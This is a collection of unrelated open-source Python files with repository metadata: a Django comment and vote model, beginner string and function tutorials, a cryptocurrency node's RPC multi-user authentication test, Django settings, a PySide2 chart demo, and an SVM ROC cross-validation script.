        source = self.email.lower() if self.email else self.name
        digest = hashlib.md5(source.encode('utf-8')).hexdigest()
        base = "//www.gravatar.com/avatar/%s.jpg?" % digest
        if self.email:
            query = {'d': 'retro', 's': 64}
        else:
            # 'f': 'y' forces the generated default image.
            query = {'d': 'retro', 's': 64, 'f': 'y'}
        return base + urllib.parse.urlencode(query)
class Thread(models.Model):
    """A discussion thread; individual comments are Post rows pointing here."""
    CATEGORIES = (
        ('discussion', _('Discussion')),
        ('request', _('Request')),
        ('issue', _('Issue')),
    )
    category = models.CharField(_('Category'), max_length=20, choices=CATEGORIES, default='discussion')
    crdate = models.DateTimeField(_('Date created'), auto_now_add=True)
    tstamp = models.DateTimeField(_('Date changed'), auto_now=True)
    is_closed = models.BooleanField(_('Is closed'), blank=True, default=False)
    is_deleted = models.BooleanField(_('Is deleted'), blank=True, default=False)
    class Meta:
        ordering = ('-crdate', '-tstamp')
    def __str__(self):
        """Human-readable label: the translated category name."""
        return self.get_category_display()
    def get_absolute_url(self):
        """Canonical URL of this thread's post listing."""
        thread_kwargs = {'category': self.category, 'thread_id': self.id}
        thread_link = reverse('comments:show_posts', kwargs=thread_kwargs)
        return thread_link
    @property
    def first_staff_post(self):
        """Root post as staff sees it: deleted/spam roots stay visible for one day."""
        yesterday = timezone.now() - datetime.timedelta(days=1)
        return self.posts.filter(parent=None).exclude(Q(is_deleted=True) | Q(is_spam=True), Q(tstamp__lt=yesterday)).get()
    @property
    def first_active_post(self):
        """Root post as regular users see it (approved, not deleted, not spam)."""
        return self.posts.filter(parent=None).exclude(Q(is_deleted=True) | Q(is_spam=True) | Q(is_approved=False)).get()
class Post(models.Model):
    """A single comment in a Thread, optionally replying to a parent post."""
    parent = models.ForeignKey('self', related_name='posts', blank=True, null=True)
    thread = models.ForeignKey(Thread, related_name='posts')
    author = models.ForeignKey(Author, related_name='posts')
    content = models.TextField(_('Comment'))
    # Sanitized HTML rendering of `content`; None until the cleaner has run.
    content_cleaned = models.TextField(null=True, editable=False)
    crdate = models.DateTimeField(_('Date created'), auto_now_add=True)
    tstamp = models.DateTimeField(_('Date changed'), auto_now=True)
    edited = models.DateTimeField(_('Date edited'), blank=True, null=True)
    is_deleted = models.BooleanField(_('Is deleted'), blank=True, default=False)
    is_approved = models.BooleanField(_('Is approved'), blank=True, default=False)
    is_flagged = models.BooleanField(_('Is flagged'), blank=True, default=False)
    is_spam = models.BooleanField(_('Is spam'), blank=True, default=False)
    is_highlighted = models.BooleanField(_('Is highlighted'), blank=True, default=False)
    # All cleaning is serialized through this semaphore (the shared cleaner
    # instance is presumably not safe for concurrent use — confirm).
    cleaner_sem = threading.Semaphore()
    cleaner = bleach.Cleaner(tags=('br', 'p', 'a', 'b', 'i', 'strong', 'em'),
                             filters=[bleach.linkifier.LinkifyFilter])
    class Meta:
        ordering = ('crdate', 'tstamp')
    def __str__(self):
        return '%s by %s' % (self.thread, self.author)
    def get_absolute_url(self):
        """URL of the containing thread with an anchor to this post."""
        thread_kwargs = {'category': self.thread.category, 'thread_id': self.thread.id}
        thread_link = reverse('comments:show_posts', kwargs=thread_kwargs)
        thread_link_post = '%s#p%d' % (thread_link, self.id)
        return thread_link_post
    def get_cleaned_content(self):
        return self.cleaned_content
    get_cleaned_content.allow_tags = True
    # BUG FIX: admin_order_field must be the field *name* as a string; the
    # original assigned the TextField instance itself.
    get_cleaned_content.admin_order_field = 'content_cleaned'
    get_cleaned_content.short_description = _('Comment')
    def fix_linebreaks(self, content):
        """Normalize <p>/<br> markup back to newlines, then reapply Django linebreaks."""
        content = content.replace('<p>', '')
        content = content.replace('</p>', '\n\n')
        content = content.replace('<br>', '\n')
        content = content.replace('<br/>', '\n')
        content = content.replace('<br />', '\n')
        return html.linebreaks(content)
    def clean_content(self, commit=True):
        """Sanitize `content` into `content_cleaned`; persist it when commit and saved."""
        fixed_linebreaks = self.fix_linebreaks(self.content)
        with self.cleaner_sem:
            self.content_cleaned = self.cleaner.clean(fixed_linebreaks)
        if commit and self.id:
            self.save(update_fields=('content_cleaned',))
        return self.content_cleaned
    @property
    def cleaned_content(self):
        """Sanitized HTML, or a translated placeholder while cleaning is pending."""
        if not self.content_cleaned:
            content = _('This post is still being processed, please give it a few seconds and reload this page.')
            return safestring.mark_safe(u'<p>%s</p>' % content)
        return self.content_cleaned
    @property
    def staff_posts(self):
        """Replies visible to staff: deleted/spam replies are hidden only after a day."""
        yesterday = timezone.now() - datetime.timedelta(days=1)
        return self.posts.exclude(Q(is_deleted=True) | Q(is_spam=True), Q(tstamp__lt=yesterday))
    @property
    def active_posts(self):
        """Replies visible to regular users (approved, not deleted, not spam)."""
        return self.posts.exclude(Q(is_deleted=True) | Q(is_spam=True) | Q(is_approved=False))
    @property
    def is_editable(self):
        """Editable while the thread is open, the post is under a day old, and it has no replies."""
        if self.thread.is_closed:
            return False
        yesterday = timezone.now() - datetime.timedelta(days=1)
        if self.crdate < yesterday:
            return False
        if self.posts.exists():
            return False
        return True
    @property
    def vote_sum(self):
        """Sum of vote modes (+1/-1); None when the post has no votes."""
        return self.votes.aggregate(vote_sum=models.Sum('mode'))['vote_sum']
class Vote(models.Model):
    """A single up/down vote by a user on a post (one vote per pair, see Meta)."""
    MODES = (
        ( 1, _('Up')),
        (-1, _('Down')),
    )
    post = models.ForeignKey(Post, related_name='votes')
    user = models.ForeignKey(User, related_name='votes')
    mode = models.SmallIntegerField(_('Mode'), choices=MODES)
    class Meta:
        unique_together = ('post', 'user')
class Media(models.Model):
    """An uploaded image belonging to a post."""
    post = models.ForeignKey(Post, related_name='media')
    # width/height are filled in automatically from the uploaded image.
    image = models.ImageField(
        _('Image'), upload_to='comments/posts/%Y/%m/%d',
        width_field='width', height_field='height', max_length=250)
    width = models.SmallIntegerField(_('Width'))
    height = models.SmallIntegerField(_('Height'))
class Attachment(models.Model):
    """An arbitrary file attached to a post."""
    post = models.ForeignKey(Post, related_name='attachments')
    file = models.FileField(
        _('File'), upload_to='comments/posts/%Y/%m/%d', max_length=250)
@receiver(signals.pre_save, sender=Post)
def handle_post_pre_save_signal(sender, instance, update_fields, **kwargs):
    """Invalidate the cached sanitized HTML whenever the raw content changes."""
    if not update_fields or 'content' in update_fields:
        instance.content_cleaned = None
@receiver(signals.post_save, sender=Post)
def handle_post_post_save_signal(sender, instance, update_fields, **kwargs):
    """Queue asynchronous re-cleaning of the post content after each save."""
    # Local import — presumably to avoid a circular import at module load; confirm.
    from .tasks import clean_post_content
    if not instance.content_cleaned:
        clean_post_content.apply_async(countdown=1, kwargs={'post_id': instance.id})
| [
"info@marc-hoersken.de"
] | info@marc-hoersken.de |
31974bb9dc65df7814e3e6dde721d7d4a5d22f12 | 1ce29b37fb1bdaa0fb5e464be967153b43735a33 | /ClassworkNotes/Python/basic_strings.py | b8edebd1ccc24f0db6c7d2d4e3c35252812032d3 | [] | no_license | Kushendra1/csci127-assignments | 84c32298496f056dd3babb53d501c2e0a28d07f6 | cd26fbaab0ff89c5158410e533da5176671e87c0 | refs/heads/master | 2020-03-28T03:45:33.313295 | 2018-12-20T15:46:16 | 2018-12-20T15:46:16 | 147,669,145 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | def bondify(name):
"""
takes in a string in the form "first last" and returns it in the form "last, first last"
"""
space_index = name.find(" ")
first = name[0:space_index]
last = name[space_index:]
bond_name = last + "," + first + last
return bond_name
print(bondify("James Bond"))
def capitalize_name(name):
"""
name -> a string in the form "first last" all lowers case
returns -> the string with both names capitalized
ex: james bond -> James Bond
"""
s = "Hello World"
print("s = ", s) #adding two strings to put using one argument
print("Access the first character:", s[0]) #printing two seperate strings
#s[0]="Z" this is illegal, you can't change a string
#slices are parts of a string using the character numbers
#You can't change a string, but you can make a new string and reassign the value of s to it
| [
"Kushendra.Ramrup59@myhunter.cuny.edu"
] | Kushendra.Ramrup59@myhunter.cuny.edu |
2d7eeda797ab89b6dcdc3bdf30a93caba5a6dfab | 53b1e8400e2c1649e719e3c34825c35c78831bbe | /Methods/functions.py | e0cfb80876b9f5def5acd75cd526d934ea85cf99 | [] | no_license | johndward01/Python_Course | 8a35fa1225b9739b74c7960ed0eec30170bf0809 | 42cd4dbbc889d689fcd798d484f37488fa206ea3 | refs/heads/main | 2023-01-30T13:30:43.217127 | 2020-12-11T00:55:42 | 2020-12-11T00:55:42 | 310,707,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,402 | py | # FUNCTIONS
# In Python a function is defined using the def keyword:
# Creating the function
# def greeting(first_name, last_name):
# print(f"Hello, {first_name} {last_name}!")
# Calling the function
# greeting("John", "Ward")
# If you do not know how many arguments that will be passed into your function,
# add a * before the parameter name in the function definition.
# def add(*args):
# result = 0
# for x in args:
# result += x
# print(result)
# add(1,2,3,4,56)
# KEYWORD ARGUMENTS -> **kwargs
# You can also send arguments with the key = value syntax.
# This way the order of the arguments does not matter.
# def print_coordinates(x,y):
# print(f"({x},{y})")
#
# print_coordinates(y = 2, x = 4)
# If you do not know how many keyword arguments that will be passed into your function, add two asterisk: ** before the parameter name in the function definition.
#
# This way the function will receive a dictionary of arguments,
# and can access the items accordingly:
# def my_function(**kwargs):
# print("arg1 is: " + kwargs["arg1"])
#
# my_function(arg2 = "second argument", arg1 = "first argument")
# Default Parameter Value
# If no arguments are given then the default parameter will be used
# def my_function(country = "The United States"):
# print("I am from " + country)
# my_function()
# my_function("Germany")
# my_function("Some random place")
| [
"johndward01@yahoo.com"
] | johndward01@yahoo.com |
5c0c1e4112f6deae0874413137f5c0775304d546 | 8cb83d12ac73a7a1c522fd6281b2dc1989cf738f | /test/functional/multi_rpc.py | 3da655f4e594fdfc6537849db6266d1a7a311ab6 | [
"MIT"
] | permissive | MmyGoal/OHHO | 41e86bb763ab03375a900ce0e3366ffb11e5562d | 6eb808b41e7fb56809e6988e32029a5b379c30dc | refs/heads/master | 2023-01-24T05:52:01.707651 | 2020-12-08T15:28:11 | 2020-12-08T15:28:11 | 291,229,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,977 | py | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import str_to_b64str, assert_equal
import os
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_chain(self):
super().setup_chain()
#Append rpcauth to bitcoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
with open(os.path.join(self.options.tmpdir+"/node0", "ohho.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
with open(os.path.join(self.options.tmpdir+"/node1", "ohho.conf"), 'a', encoding='utf8') as f:
f.write(rpcuser+"\n")
f.write(rpcpassword+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
# rpcuser and rpcpassword authpair
rpcuserauthpair = "rpcuser💻:rpcpassword🔑"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rpcuser's password
rpcuserauthpair = "rpcuserwrong:rpcpassword"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rpcuser
rpcuserauthpair = "rpcuser:rpcpasswordwrong"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| [
"54119958+markerz99@users.noreply.github.com"
] | 54119958+markerz99@users.noreply.github.com |
79cc6205452c79cfb1cc543f62aed8cc6697d6e1 | 95b9c261c416538063c3e413de7bb40c21ab08c9 | /CommentsApp/forms.py | 68aad2e268c1cc3c3587a401aca57c4675ed7c05 | [] | no_license | Michael41000/CSCapstone | 403ec23e6a6d727d80b7533fdb62bfe3f24747fe | 8309767373ac4d8edf432bdf0de08c510a842dce | refs/heads/master | 2020-12-24T08:54:08.038810 | 2016-12-08T18:22:09 | 2016-12-08T18:22:09 | 73,310,895 | 1 | 0 | null | 2016-11-15T00:51:16 | 2016-11-09T18:37:59 | Python | UTF-8 | Python | false | false | 114 | py | from django import forms
class CommentForm(forms.Form):
comment = forms.CharField(label='Text', max_length=500)
| [
"mrollber@purdue.edu"
] | mrollber@purdue.edu |
96766b767b7e79f7fb5ea45946f0cff5d54bc1c8 | 47dc4152dd163ce751d4703f19bb5339fc1cfb98 | /djchat/settings.py | dae41d6fb978e9e0118e1da42103746c0c1bbbbe | [
"BSD-3-Clause"
] | permissive | michaelXDzhang/pulsar-django | 85cf3437a578b2b198ea2f794d1a1f4db8a78ec1 | 0aa20e1c08b6a782cd634e736e2238776e0c98d5 | refs/heads/master | 2020-07-27T01:06:32.586546 | 2017-11-28T10:18:34 | 2017-11-28T10:18:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,562 | py | """
Django settings for djchat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
APP_DIR = os.path.dirname(__file__)
BASE_DIR = os.path.dirname(APP_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fux9z2i)6ab$b_5*^z@96hdtqfj5=ct7b)m6_6cfrr5g%x#=81'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pulse',
'djchat'
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(APP_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages'
]
}
}
]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'djchat.views.middleware'
)
ROOT_URLCONF = 'djchat.urls'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| [
"luca@quantmind.com"
] | luca@quantmind.com |
81063a6e3d985fbef8bfdf7fa09786028090fef0 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_231/ch45_2020_04_12_23_45_54_626320.py | c4a53b37d17f38d42ea23fb09e36af31d98485ca | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | lista=[]
lista_reversa=[]
a=int(input('digite um numero:'))
i=(0)
while a>0:
lista.append(a)
i+=1
a=int(input('digite um numero:'))
del lista[i]
while i>=0:
lista_reversa.append(lista[i])
i-=1
print(lista_reversa) | [
"you@example.com"
] | you@example.com |
353f6ace23c860944d395acbddc17d45254171ca | 57cdf9b356ef8e498eae4c67b812c3271022d414 | /projects/one_joint_board1/one_joint_board1_pytester/Utilities.py | b3dd8387ede05205ebc7ebdca8f8fd1bb9b87263 | [] | no_license | sirishn/nerf-verilog | 07fb47f5cddfe74d510d11fcd4639b87db585e59 | 7d92ed54d7820ea64a1a2f9f74474c283d99d835 | refs/heads/master | 2020-04-13T03:01:11.506851 | 2018-12-23T20:02:41 | 2018-12-23T20:02:41 | 162,919,335 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,374 | py | from struct import pack, unpack
from PyQt4.QtCore import Qt
VIEWER_REFRESH_RATE = 10 # in ms, This the T for calculating digital freq
PIPE_IN_ADDR = 0x80
BUTTON_RESET = 0
BUTTON_RESET_SIM = 1
BUTTON_ENABLE_SIM = 2
DATA_EVT_CLKRATE = 0
# address name visual_gain type color
CHIN_PARAM = (0x20, 'f_len', 50, 'float32', 'Qt.blue'), \
(0x22, 'f', 1.0, 'float32', 'Qt.red'), \
(0x24, 'i_CN_spkcnt', 1.0, 'int32', 'Qt.green'), \
(0x26, 'i_Combined_spkcnt', 1.0, 'int32', 'Qt.black'), \
(0x28, 'i_MN_emg', 1.0, 'int32', 'Qt.magenta'), \
(0x30, 'i_CN_emg', 1.0, 'int32', 'Qt.darkRed'), \
(0x32, 'i_combined_emg', 1.0, 'int32', 'Qt.darkGray'), \
# (0x36, 'i_emg_mu7', 1.0, 'int32', 'Qt.blue'), \
# (0x28, 'f_force_mu3', 1.0, 'float32', 'Qt.red')
NUM_CHANNEL = len(CHIN_PARAM) # Number of channels
DATA_OUT_ADDR = list(zip(*CHIN_PARAM)[0])
CH_TYPE = list(zip(*CHIN_PARAM)[3])
# trig_id name type default_value
CHOUT_PARAM = (1, 'pps_coef_Ia', 'float32', 3.0), \
(2, 'tau', 'float32', 0.01), \
(3, 'close_loop', 'int32', 0), \
(4, 'gamma_dyn', 'float32', 80.0), \
(5, 'gamma_sta', 'float32', 80.0), \
(6, 'gain_big_MN', 'int32', 4), \
(7, 'gain_med_MN', 'int32', 6), \
(8, 'gain_small_MN', 'int32', 8)
SEND_TYPE = list(zip(*CHOUT_PARAM)[2])
BIT_FILE = "../one_joint_board1_xem6010.bit"
SAMPLING_RATE = 1024
#NUM_NEURON = 512
NUM_NEURON = 128
def ConvertType(val, fromType, toType):
return unpack(toType, pack(fromType, val))[0]
import sys, re
def interp(string):
locals = sys._getframe(1).f_locals
globals = sys._getframe(1).f_globals
for item in re.findall(r'#\{([^}]*)\}', string):
string = string.replace('#{%s}' % item,
str(eval(item, globals, locals)))
return string
| [
"sirish@Gold-Rush.local"
] | sirish@Gold-Rush.local |
89cf43fcdba2962e0c3b290682879d4b9bac3ca5 | 2dbbd1574a209d26f369aa352baf0414aa6817c1 | /Google-IT-Automation/PythonOS/Week5 /Testcases/emails.py | 62eaaa2eaaba4f0c0937a1023cbcab42c0a82caf | [] | no_license | vvbaliga/PythonCourse | b65f2782c8ce892914030f50a49d3ccbabca4703 | 73ac0031911ecd074769b1e1f7dba834144e5014 | refs/heads/master | 2022-11-06T05:42:02.048764 | 2020-06-25T03:04:29 | 2020-06-25T03:04:29 | 228,270,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py |
#!/usr/bin/env python3
# python3 emails_test.py
import csv
import sys
def populate_dictionary(filename):
"""Populate a dictionary with name/email pairs for easy lookup."""
email_dict = {}
with open(filename) as csvfile:
lines = csv.reader(csvfile, delimiter=',')
for row in lines:
name = str(row[0].lower())
email_dict[name] = row[1]
return email_dict
def find_email(argv):
""" Return an email address based on the username given."""
# Create the username based on the command line input.
try:
fullname = str(argv[1] + " " + argv[2])
# Preprocess the data
email_dict = populate_dictionary(
'user_emails.csv')
# If email exists, print it
if email_dict.get(fullname.lower()):
return email_dict.get(fullname.lower())
else:
return " No email address found"
except IndexError:
return "Missing parameters"
def main():
print(find_email(sys.argv))
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | vvbaliga.noreply@github.com |
f22210c8427f7e7a65853ec23b3430b0491d5c34 | c97fc7658c39feb51c0ed42c04783797c8675b8a | /xm_1/qt简单数据可视化.py | 8536d7db1bea48f72b69fae54a0168600924e53b | [] | no_license | githubvit/study | 8bff13b18bea4954e8ed1b4619a091b134b8ff97 | 845e19d1225f1aa51c828b15effac30be42fdc1b | refs/heads/master | 2023-02-20T15:59:19.635611 | 2021-12-15T08:30:54 | 2021-12-15T08:30:54 | 241,928,274 | 1 | 1 | null | 2023-02-02T06:18:48 | 2020-02-20T16:08:06 | Python | UTF-8 | Python | false | false | 1,548 | py | # Qt数据可视化 https://doc.qt.io/qt-5/qtcharts-overview.html
from PySide2 import QtGui, QtWidgets
from PySide2.QtCharts import QtCharts
# 在Qt5.7版本后将Qt Charts加入到了Qt模块中。
# 我们可以方便的使用这个模块,绘制很多样式的图形,比如折线、饼图等,快速实现数据可视化。
# 用Qt Charts绘制,大概分为四个部分:
# 数据(QXYSeries)、QChart(不知怎么称呼)、坐标轴(QAbstractAXis)和视图(QChartView)。
# 要注意的是 QChart要先添加数据(QXYSeries)
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
series = QtCharts.QLineSeries()#定义线条 连续折线图
# 加点 添加数据
series.append(0,0)
series.append(1,7)
series.append(1.2,14)
series.append(1.3,21)
series.append(1.4,28)
series.append(1.5,35)
self.chartView = QtCharts.QChartView() # 定义ui
self.chartView.chart().addSeries(series) # 添加 线条 即 数据
self.chartView.chart().createDefaultAxes() # 创建 坐标轴
series.setColor(QtGui.QColor("salmon")) # 给线条设置颜色 salmon 橙红色,粉橙色
self.setCentralWidget(self.chartView) # 给QMainWindow窗口设置中心部件,必须的
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
w = MainWindow()
w.resize(640, 480)
w.show()
sys.exit(app.exec_()) | [
"sgq523@163.com"
] | sgq523@163.com |
43f0f0b13d9f8bf38f11d2a9376cd611e7b2d20b | dbfa0fb294e652f819ddf5310aa6e64383e55e29 | /roc_cv.py | 3193697a763d48c04040be99fd84340934f0ff65 | [] | no_license | Luiscn/CarcinogenPrediction | 8073f02aea2cf9668774046affb3340f49da3a83 | 6674b5c73d3b2933893fb88128af0c9651c64f85 | refs/heads/master | 2020-04-09T01:37:26.116718 | 2018-12-02T23:13:36 | 2018-12-02T23:13:36 | 159,911,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,829 | py | import numpy as np
from scipy import interp
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.model_selection import StratifiedKFold
# #############################################################################
# Data IO and generation
os.chdir('/Users/luis/Dropbox/CompBio')
data = sio.loadmat('TGGATES')
os.chdir('/Users/luis/Documents/CompBio/project/py')
ctrlMatrix = data['ctrlMatrix']
highMatrix = data['highMatrix']
relMatrix = highMatrix / ctrlMatrix
relMatrix_store = relMatrix
relMatrix = relMatrix_store
relMatrix = sklearn.preprocessing.normalize(relMatrix, norm='l2', axis=0, copy=True, return_norm=False)
print(relMatrix.shape)
true = np.array(['N', 'Y', 'N', 'Y', 'Y', 'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N', 'Y', 'Y',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N', 'Y', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N',
'N', 'Y', 'N', 'Y', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'Y', 'N',
'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N',
'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'Y', 'Y', 'N', 'Y', 'N', 'N', 'Y',
'N', 'Y', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'Y', 'Y', 'N', 'N', 'N', 'N', 'N',
'Y', 'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N'])
label = np.zeros(150)
for i in range(150):
if true[i] == 'N':
label[i] = 0
elif true[i] == 'Y':
label[i] = 1
#chi2 feature selection
number_of_features = 100
selector = SelectKBest(chi2, k=number_of_features)
X_new = selector.fit_transform(relMatrix, label)
print(X_new.shape)
#print(selector.get_support(indices=True))
X = X_new
y = label
random_state = np.random.RandomState(0)
# Run classifier with cross-validation and plot ROC curves
cv = StratifiedKFold(n_splits=5)
classifier = svm.SVC(C=1.0, cache_size=2000, class_weight='balanced', coef0=0.0,
decision_function_shape='ovo', gamma='auto', kernel='linear',
max_iter=-1, probability=True, random_state=None, shrinking=True,
tol=0.001, verbose=False)
tprs = []
aucs = []
resolution = 100
mean_fpr = np.linspace(0, 1, resolution)
#fig = plt.figure(dpi=200)
i = 0
for train, test in cv.split(X, y):
probas_ = classifier.fit(X[train], y[train]).predict_proba(X[test])
# Compute ROC curve and area the curve
fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])
tprs.append(interp(mean_fpr, fpr, tpr))
tprs[-1][0] = 0.0
roc_auc = auc(fpr, tpr)
aucs.append(roc_auc)
plt.plot(fpr, tpr, lw=1, alpha=0.3,
label='ROC fold %d (AUC = %0.2f)' % (i+1, roc_auc))
i += 1
plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',
label='Chance', alpha=.8)
mean_tpr = np.mean(tprs, axis=0)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
std_auc = np.std(aucs)
plt.plot(mean_fpr, mean_tpr, color='b',
label=r'Mean ROC (AUC = %0.2f $\pm$ %0.2f)' % (mean_auc, std_auc),
lw=2, alpha=.8)
std_tpr = np.std(tprs, axis=0)
tprs_upper = np.minimum(mean_tpr + std_tpr, 1)
tprs_lower = np.maximum(mean_tpr - std_tpr, 0)
plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,
label=r'$\pm$ 1 std. dev.')
plt.scatter((np.where(mean_tpr==1)[0][0])/resolution,1,marker='*', color='r',s=200)
